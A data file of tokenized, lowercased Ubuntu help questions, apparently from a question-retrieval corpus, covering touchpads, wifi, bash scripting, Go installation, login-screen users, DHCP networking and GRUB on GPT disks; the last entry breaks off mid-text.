403744	enable right click button on touchpad on asus b400-xh51	the right click button on my new asus b400-xh51 does not work . i have tried two fixes i found online , but neither of them seem to work . the first is available at http : //www.linuxquestions.org/questions/linux-hardware-18/touchpad-capabilities-detected-incorrectly-4175457312/ and touchpad issues on hp pavilion dm4 ( ca n't right click ) unfortunately , both commands described in the solution output an error : x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 131 ( xinputextension ) minor opcode of failed request : 37 ( x_changedeviceproperty ) value in failed request : 0x12a serial number of failed request : 22 current serial number in output stream : 25 second , i installed the scripts at : https : //github.com/avernois/enable-elantech-on-ubuntu . the device id of the elantech touchpad is 13 -- i included `` 13 '' as a command-line parameter to the scripts . these scripts did not report any errors , but they also have not fixed the problem . here is the output from synclient : parameter settings : leftedge = 130 rightedge = 3126 topedge = 87 bottomedge = 1541 fingerlow = 1 fingerhigh = 1 fingerpress = 256 maxtaptime = 180 maxtapmove = 160 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 0 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 72 horizscrolldelta = 72 vertedgescroll = 1 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 0 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0549451 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 291 edgemotionusealways = 0 touchpadoff = 0 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 3 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 18 verthysteresis = 18 clickpad = 1 rightbuttonarealeft = 1791 rightbuttonarearight = 3256 rightbuttonareatop = 1334 rightbuttonareabottom = 3256 middlebuttonarealeft = 1465 middlebuttonarearight = 1790 middlebuttonareatop = 1334 middlebuttonareabottom = 3256 can anyone suggest other things to try ?
403746	why am i able to connect to only one wireless network ?	after installing ubuntu i want to connect to other wi-fi spots but it wont work . only it does with the first one . gonzalo @ bob : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bg essid : '' jaqueline1 '' mode : managed frequency:2.437 ghz access point : fc:75:16:44 : a4 : a2 bit rate=48 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=63/70 signal level=-47 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:5007 missed beacon:0
403747	how to access gui from tty mode ?	i am using ubuntu 13.10 32-bit . i am using terminal mode to test a window manager . i know i can use ctrl+alt+f1 to go to terminal mode from the gui mode . but there is still graphical desktop running in background . is there a command to move from cli to gui mode so that i can access that gui ?
403748	why does my condition always evaluate as true ?	i 'm writing my first bash script and i 've hit a snag . here 's an example where i ask for a name , ask for an age , and display a message that changes depending on whether or not the age is < = 35 : # ! /bin/bash agelimit = 34 echo `` what is your name ? '' read username echo `` how old are you ? '' read userage if ( ( `` $ userage '' -le `` $ agelimit '' ) ) ; then echo `` hey , $ username . at $ userage years old , you are young . '' else echo `` gosh , $ username . at $ userage years old , you 're pretty old . '' fi no matter what number i answer for age , i am told i am young . this is running on raspbian -- in case that helps . thanks ! jeremy
403749	how to upgrade from 13.04 to 13.10 ?	i have tried installing all the available updates and when i check again for updates it says the computer is up to date . how can i upgrade ?
403754	how to make backspace work on ubuntu 13.04	i have recently updated ubuntu from 12.10 to 13.04 . now i observed that backspace is not working for folder ( up and back functionality ) . i just found that ubuntu has decided to use alt + ( left right arrows ) for this functionality of moving up and down for folder structure through keyboard also to bring back the backspace feature i found some code gedit .config/nautilus/accels ( gtk_accel_path `` < actions > /shellactions/up '' `` backspace '' ) ( add this line at end ) restart the system i just did exactly as above , but after restarting i ca n't able to see the line i added in accels file ( i think its just not accepting the changes and reloading to original file ) so why is this happening , why the changes are not saving ? is there any other way to make the backspace functionality for folder to work in ubuntu ?
403756	is the development version of ubuntu cloned from the immediate previous stable release ?	i installed ubuntu 14.04 and saw that it showed ubuntu 13.10 while installing . i could confirm i installed ubuntu 14.04 when i did this on a terminal : lsb_release -a and got this as output : distributor id : ubuntu description : ubuntu 14.04 ( developement release ) release : 14.04 codename : trusty so are the development versions directly cloned from the previous stable releases ? if yes , does n't a radical change like the change to mir from xorg be difficult to implement since the underlying platform itself change ? p.s . : i am not sure whether this should be on ao , as this is a question on development release but then such questions have no scope to be asked anywhere else .
403766	duplicate icons for manully created gnome launcher items	i have downloaded aptana studio 3 and created the following launcher item for using alacarte : file : alacarte-made.desktop [ desktop entry ] comment= terminal=false name=aptana studio 3 exec=aptanastudio3 type=application icon=/opt/aptana-studio-3/icon.xpm then , when i add the icon to the favorites and opens the aptana studio 3 i get two icons for it , one for launching new instances , and one for the currently running instance as per the following screenshot : how do i force the application to use the same icon added to the favorites ?
403768	access power/chargin leds	i 'm trying to access the leds on the front of my laptop - it 's an asus aspire v5-531 - they 're the power and charging leds . they 're not registered in /sys/class/leds ... root @ darkside : /sys/class/leds # ls ath9k-phy0 that would be the leds on the ethernet port . i know that the leds are referenced somewhere , due to this : root @ darkside : /sys/class/leds/ath9k-phy0 # cat trigger none adp1-online cpu0 cpu1 cpu2 cpu3 cpu4 cpu5 cpu6 cpu7 mmc0 rfkill0 phy0rx phy0tx phy0assoc [ phy0radio ] phy0tpt rfkill1 bat0-charging-or-full bat0-charging bat0-full bat0-charging-blink-full-solid bat0 referencing the battery , of course : ) problem is , how the hell do i access the leds so that i can manipulate them ?
403770	wireless connection ?	i 've created a wireless connection but : the following happens 1.the network is not being broacasted to another computer 2.the network is very much unclear , displaying unconfigured : a . ) no channels b . ) no speed 3.sometimes the netwrork itself shows not created . note : i use `` realtek semiconductor corp. rtl8188cus 802.11n wlan adapter ''
403771	how to reinstall unity ?	a few months ago i installed this ppa from the recommendation of this answer . it now turns out that it 's buggy as hell and breaks nearly everything almost all the time . i tried removing the ppa and reinstalling unity , but i get the message reinstallation of unity is not possible , it can not be downloaded . how do i go back to using unaltered unity ?
403773	wifi connection , mouse pointers problems in ubuntu 13.8	i newly insatlled ubuntu very latest version .first three days it was worked fine but now i have problem in wifi and mouse pointer for mose pointer each and every time i use this commands sudo modprobe -r psmouse sudo modeprobe psmouse for wifi my wifi signal does n't blinking i dont how to activate my wifi port but it was worked fine initially what are the permenant solutions for this
403774	installing go on ubuntu - `` the program 'go ' is currently not installed ''	this should be a simple thing . i followed the instruction on `` http : //golang.org/doc/install '' to install `` go '' on ubuntu . downloaded it unzipped it to `` usr/local '' added the path in `` /etc/profile '' ( export path= $ path : /usr/local/go/bin ) but when i type in `` go '' it says `` the program 'go ' is currently not installed '' . what should i do ?
403777	service account shows up on login screen	i 've manually created a service user account on my machine , and i 'm surprised to see it on the unity login screen . i searched this site and i 've seen people had problems with this , but in those cases , the uid was above minimum-uid and the suggestion was to either change the uid or add the user to the hidden-users list . but my case is different . the user account in question is : mgsmtp : x:118:8 : :/opt/mgsmtp/ : /bin/sh uid = 118 ; gid = 8 ( mail ) my /etc/lightdm/users.conf file is configured like this : [ useraccounts ] minimum-uid=500 hidden-users=nobody nobody4 noaccess hidden-shells=/bin/false /usr/sbin/nologin in my understanding , since the uid is below 500 , it must not show up on the login screen . but it does anyway . i also do n't understand why all the other service accounts do n't show up then - they are n't listed in hidden-users either . i do n't see the difference between my service account and all the others on the system . note that i have this service account for more than a year now , but it only showed up on the login screen after i upgraded to saucy from quantal . before that , while i was using quantal , it was correctly hidden . before using the hidden-users hack , i 'd like to understand why it works like this .
403782	is there an alternative for 'ppasearch ' in newer versions of ubuntu ?	is there an alternative for ppasearch ( command-line app ) in newer versions of ubuntu ? ppasearch is only avaiable for 10.10 , 10.04 and 9.10 .
403784	unable to upgrade through sudo apt-get upgrade or through software center	i have tried upgrading the software through software center however the software center keeps on crashing . when i tried through the terminal i got the following message : - sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : gir1.2-javascriptcoregtk-3.0 gir1.2-webkit-3.0 gnome-control-center gnome-control-center-data libgnome-control-center1 libjavascriptcoregtk-1.0-0 libjavascriptcoregtk-3.0-0 libssl1.0.0 libssl1.0.0 : i386 libwebkitgtk-1.0-0 libwebkitgtk-1.0-common libwebkitgtk-3.0-0 libwebkitgtk-3.0-common openssl xserver-common xserver-xorg-core 16 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/27.4 mb of archives . after this operation , 17.4 kb of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... dpkg : warning : files list file for package 'libclone-perl ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libc-bin ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libcogl12 : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libbz2-1.0 : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libclutter-gst-2.0-0 : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libcogl-pango12 : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libclutter-1.0-common ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libclucene-core1 : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libcogl-common ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libclucene-contribs1 : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libc-dev-bin ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libcolamd2.7.1 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libcloog-isl4 : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libcmis-0.3-3 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libclutter-gtk-1.0-0 : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libclutter-1.0-0 : amd64 ' missing ; assuming package has no files currently installed dpkg : unrecoverable fatal error , aborting : files list for package 'libc6-dbg : amd64 ' is not a regular file e : sub-process /usr/bin/dpkg returned an error code ( 2 ) i have also tried sudo apt-get -f upgrade and sudo apt-get install -- reinstall libc6-dbg : amd64 but still got the same error and also tried the sudo apt-get install -f and sudo apt-get autoremove . it gave the following message . reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 16 not upgraded .
403785	mount your box account or sync a folder with it	i 'd want box cloud storage as automatically mounted in ubuntu or sync this with a folder in my home . for the first one , i followed this tutorial but when i restarted i tried to mount but it says : /sbin/mount.davfs : mounting failed . 302 found for the second one i created a folder in my home , then file- > link to server ... i filled all data but the same it says : error http found where is the problem ? i checked everywhere the address but it should be ok ! any suggestions ? what method is the better , the first one or the second one ? where is the difference ?
403786	running 64 bit file on 32 bit ubuntu	i have a 64 bit exe file and would like to run on 32bit ubuntu os through vmware because i am not able to install 64 bit ubuntu on my system.it is showing errors in installation . 1 ) so is there any technique to run the 64 bit file on 32 bit ubuntu ? 2 ) if installing ubuntu 64 bit is the only option , then help me through it 's procedue
403787	installing theme , problems with icons ubuntu 12.10	i was installing flattastic theme . copied the unzip files to /usr/share/themes and selected theme using tweak tool . ubuntu 12.10 problem 1 : no flattastic related icons are listed in icon-theme . problem 2 : icons in bottom panel are blurred . how to correct them ? thanks in adavance
403788	motd is updated very rarely	i understand that pam_motd updates the motd upon login , but sometimes motd just does n't get updated for days and i 'm puzzled what might be the reason . i 'd like to add uptime and who outputs to the motd , properly calling them from /etc/update-motd.d/ scripts , but it seems quite pointless if users are shown outdate information . from update-motd man page : executable scripts in /etc/update-motd.d/* are executed by pam_motd ( 8 ) as the root user at each login , and this information is concatenated in /var/run/motd . the order of script execution is determined by the run-parts ( 8 ) -- lsbsysinit option ( basically alphabetical order , with a few caveats ) . in my understanding , the motd should be updated on each login . but it is n't . and i do n't find a script which manually updates the motd . i could add a run-parts line to the cron , but i do n't think it 's the proper way to solve this issue , as it feels like a hack or workaround . my last hope was to set /etc/pam.d/login like this : # prints the message of the day upon succesful login . # ( replaces the `motd_file ' option in login.defs ) # this includes a dynamically generated part from /run/motd.dynamic # and a static ( admin-editable ) part from /etc/motd . # session optional pam_motd.so motd=/run/motd.dynamic noupdate session optional pam_motd.so motd=/run/motd.dynamic session optional pam_motd.so i thought removing noupdate would solve the problem , but it does n't .
403789	trying to get /etc/profile working	i have ubuntu on linode vps . i intstalled latest golang as instructed on this page ( http : //golang.org/doc/install ) - steps taken are wget http : //go.googlecode.com/files/go1.2.linux-amd64.tar.gz tar -c /usr/local -xzf go1.2.linux-amd64.tar.gz added a line `` export path= $ path : /usr/local/go/bin '' in `` /etc/profile '' after this , however , when i type in `` go '' , i get `` program 'go ' is not installed '' . so i did '' source /etc/profile '' and after that it worked . however , when i logged out and logged back in , it did n't work and i got the same error . so i did `` source /etc/profile '' and it worked again . but , even after `` source /etc/profile '' , if i change my user name to something else ( e.g . `` root '' ) , i get the same error . i 've been reading and it looks like something to do with loading `` .profile '' or `` .bashrc '' . but i 'm not sure what the difference is between the two . what i want to achieve is to install `` go '' so that any user can run it . any ideas ?
403791	how to uninstall ubuntu wubi ?	i tried to follow the guide as mentioned in : how do i uninstall ubuntu wubi ? but unfortunately , i can not find the ubuntu entry in my add remove programs , and i find the guide quite confusing for manual uninstall . please guide . my os is windows 7 in c : ubuntu 13.04 is installed in d : using wubi installer . regards
403801	transferring files through wifi network	i have a desktop running windows 7 and a laptop running ubuntu . i have a wireless n router connected to both . i wanted to transfer some files from my desktop to laptop . i found an option called `` browse network '' and i connected to my desktop from laptop . i started with file transfer . now i have two doubts . does transferring files like this will consume bandwidth ? will it affect my internet usage allowance ? and the transfer speed is very slow . ( around 1.1 mb/sec ) . but my other downloads from internet are very fast . y is this slow ? thanks in advance .
403802	configuring a network on a multi ethernet port server	hy to all : i have just installed ubuntu server 12.04.3 on a sunfire x4100 this server has 4 ethernet port , my target is to use : eth0 to connect to the modem and so to internet eth1 , eth2 , eth3 to connect some switch and access point in order to create an internal lan , share resources , storage , printers , etc . to achive this target i installed a dhcp server [ apt-get install isc-dhcp-server ] and used below configuration : /etc/default/isc-dhcp-server interfaces= '' eth1 eth2 eth3 '' /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.1.5 netmask 255.255.255.0 network 192.168.1.0 gateway 192.168.1.1 dns-nameservers 8.8.8.8 8.8.4.4 auto eth1 iface eth1 inet static address 192.168.1.5 netmaks 255.255.255.0 network 192.168.1.0 auto eth2 iface eth2 inet static address 192.168.1.5 netmaks 255.255.255.0 network 192.168.1.0 auto eth3 iface eth3 inet static address 192.168.1.5 netmaks 255.255.255.0 network 192.168.1.0 my dhcp-server configuration /etc/dhcp/dhcpd.conf default-lease-time 600 ; max-lease-time 7200 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.1.255 ; option routers 192.168.1.1 ; option netbios-name-servers 192.168.1.1 ; # use google public dns option domain-name-servers 8.8.8.8 , 8.8.4.4 ; option domain-name `` mydomain.it '' ; # define address range subnet 192.168.2.0 netmask 255.255.255.0 { range 192.168.2.15 192.168.2.25 ; } the result is : server has the desired ip address and is capable to go on internet client machines receive the ip address from the dhcp but are not able to go over internet and/or either ping server or modem here-below ip ad result on the server : 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 00:14:4f:20:20:9c brd ff : ff : ff : ff : ff : ff inet 192.168.1.5/24 brd 192.168.1.255 scope global eth0 inet6 fe80 : :214:4fff : fe20:209c/64 scope link valid_lft forever preferred_lft forever 3 : eth1 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 00:14:4f:20:20:9d brd ff : ff : ff : ff : ff : ff inet 192.168.2.5/32 scope global eth1 inet6 fe80 : :214:4fff : fe20:209d/64 scope link valid_lft forever preferred_lft forever 4 : eth2 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down qlen 1000 link/ether 00:14:4f:20:20 : a2 brd ff : ff : ff : ff : ff : ff inet 192.168.3.5/32 scope global eth2 5 : eth3 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down qlen 1000 link/ether 00:14:4f:20:20 : a3 brd ff : ff : ff : ff : ff : ff inet 192.168.4.5/32 scope global eth3 6 : virbr0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc noqueue state down link/ether 06:0d:62:1a:3c : c5 brd ff : ff : ff : ff : ff : ff inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0 here below ip r on the server : default via 192.168.1.1 dev eth0 metric 100 169.254.0.0/16 dev eth3 scope link metric 1000 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.2 192.168.122.0/24 dev virbr0 proto kernel scope link src 192.168.122.1 here below a picture of the map :
403806	not getting internet on my 12.10 even if wifi connection is established	i am not getting internet even after wifi connection being established.i have two operating systems installed on my sony vaio ( e series , vpceh15en ) laptop.most amazing point is i can browse net on windows but ca n't browse it in ubuntu 12.10 . best regards nikita
403811	removing ubuntu 12.04 from triple boot of windows 7 , 8 and ubuntu	so i had a dual boot pc with windows 7 and 8 with 5 partitons , i shrinked one partition and left 50 gb of space unallocated using disk mangaement of windows 7 while installing ubuntu it gave me an option to install ubuntu alongside windows 8 so i clicked next and it installed automatically without choosing any partition , everything is fine but now i want to uninstall ubuntu but i dont know which partition it has installed when i open disk management it shows an unnamed drive of 50 gb which is mostly free , please guide in uninstalling ubuntu 12.04 , thanks in advance !
403817	`` problem booting gpt grub2 on a bios based system '' how to resolve ?	i have an intel d945gccr board with a 2gb ram having discontinued support.similarly i have an 500gb hdd with triple boot windows xp , windows 8 & ubuntu 12.04 . well the other day i came across the advantages of a gpt disk & its awesome capabilities of setting it up on a bios based system , so i decided to go with it . moreover since it would allow 128 partitions on a disk & that would put away the mbr ' s drawbacks of 3 primary partitions or maximum 4 & rest of the space unallocated . well i decided the setup on a usb stick for testing purpose since i had no spare hdd with me . the steps i followed were as follows : s1 # dd if=/dev/zero of=/dev/sdb bs=512 count=1 s2 # parted /dev/sdb s3 # mktable gpt s4 # mkpart non-fs 0 1007kb s4 # set 1 bios_grub on ( bios boot partition ) s5 # mkpartfs ext2 1024kb 500mb since some machines had fussy bioses of refusing to boot so i decided to set the protective mbr bootable using fdisk . s6 # fdisk /dev/sdb s7 # fdisk > a s7 # fdisk > w writing changes to disk ( there was no warning ) s 7 # mount /dev/sdb2 /mnt/xcv i then installed grub 2.00 to disk as follows : s8 # grub-install -- target=i386pc -- force -- no-floppy -- boot-directory=/mnt/xcv/boot /dev/sdb this gave an error of no such option -- target=i386-pc so i avoided the parameter . the installation of grub2 then completed successfully . but to my surprise when i rebooted the machine & selected the usb from my bios it just skipped it booting normally . well since i could not figure out the problem at all i decided to ask for help . the output of bootscriptinfo boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos3 ) /boot/grub on this drive . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 34 of the same hard drive for core.img . core.img is at this location and looks for ( , gpt2 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows xp boot files : /boot.ini /bootmgr /boot/bcd /ntldr /ntdetect.com sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /windows/system32/winload.exe sda3 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.04.2 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda4 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________________________________________ file system : bios boot partition boot sector type : grub2 's core.img boot sector info : sdb2 : __________________________________________________________________________ file system : ext2 boot sector type : - boot sector info : operating system : boot files : /boot/grub/core.img ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ gnu fdisk 1.2.4 copyright ( c ) 1998 - 2006 free software foundation , inc . this program is free software , covered by the gnu general public license . this program is distributed in the hope that it will be useful , partition boot start sector end sector # of sectors id system /dev/sda1 * 63 135,170,909 135,170,847 7 ntfs / exfat / hpfs /dev/sda2 135,172,096 325,636,095 190,464,000 7 ntfs / exfat / hpfs /dev/sda3 325,636,096 429,152,255 103,516,160 83 linux /dev/sda4 429,154,302 433,057,791 3,903,490 5 extended /dev/sda5 429,154,304 433,057,791 3,903,488 82 linux swap / solaris drive : sdb _____________________________________________________________________ gnu fdisk 1.2.4 copyright ( c ) 1998 - 2006 free software foundation , inc . this program is free software , covered by the gnu general public license . this program is distributed in the hope that it will be useful , partition boot start sector end sector # of sectors id system /dev/sdb1 1 3,948,543 3,948,543 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sdb1 34 1,966 1,933 bios boot partition /dev/sdb2 2,000 976,562 974,563 efi system partition '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 f6bcba5dbcba1857 ntfs /dev/sda2 828ab9a48ab994df ntfs /dev/sda3 e55facfa-1f7c-40ba-ba23-b8984d83b2e6 ext4 /dev/sda5 824dc774-d5f4-4c8f-b435-851878cf2b2b swap /dev/sdb2 67fa2c27-39ab-4fdf-a1b6-7c197717639a ext2 /dev/sr0 udf xxxxxx ================================ mount points : ================================= device mount_point type options /dev/sda3 / ext4 ( rw , errors=remount-ro ) /dev/sr0 /media/disk udf ( ro , nosuid , nodev , uid=1000 , gid=1000 , iocharset=utf8 , umask=0077 , dmode=0500 , uhelper=udisks ) ================================ sda1/boot.ini : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ; ; warning : boot.ini is used on windows xp and earlier operating systems . ; warning : use bcdedit.exe to modify windows vista boot options . ; [ boot loader ] timeout=30 default=multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows [ operating systems ] multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows= '' microsoft windows xp professional '' /noexecute=optin /fastdetect -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =========================== sda3/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root e55facfa-1f7c-40ba-ba23-b8984d83b2e6 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root e55facfa-1f7c-40ba-ba23-b8984d83b2e6 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_in insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=hidden set timeout=0 # fallback hidden-timeout code in case the timeout_style feature is # unavailable . elif sleep -- interruptible 0 ; then set timeout=0 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.5.0-23-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root e55facfa-1f7c-40ba-ba23-b8984d83b2e6 linux /boot/vmlinuz-3.5.0-23-generic root=uuid=e55facfa-1f7c-40ba-ba23-b8984d83b2e6 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-23-generic } menuentry 'ubuntu , with linux 3.5.0-23-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root e55facfa-1f7c-40ba-ba23-b8984d83b2e6 echo 'loading linux 3.5.0-23-generic ... ' linux /boot/vmlinuz-3.5.0-23-generic root=uuid=e55facfa-1f7c-40ba-ba23-b8984d83b2e6 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-23-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root e55facfa-1f7c-40ba-ba23-b8984d83b2e6 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root e55facfa-1f7c-40ba-ba23-b8984d83b2e6 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 8 ( loader ) ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root f6bcba5dbcba1857 drivemap -s ( hd0 ) $ { root } chainloader +1 } set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda3/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda3 during installation uuid=e55facfa-1f7c-40ba-ba23-b8984d83b2e6 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=824dc774-d5f4-4c8f-b435-851878cf2b2b none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda3 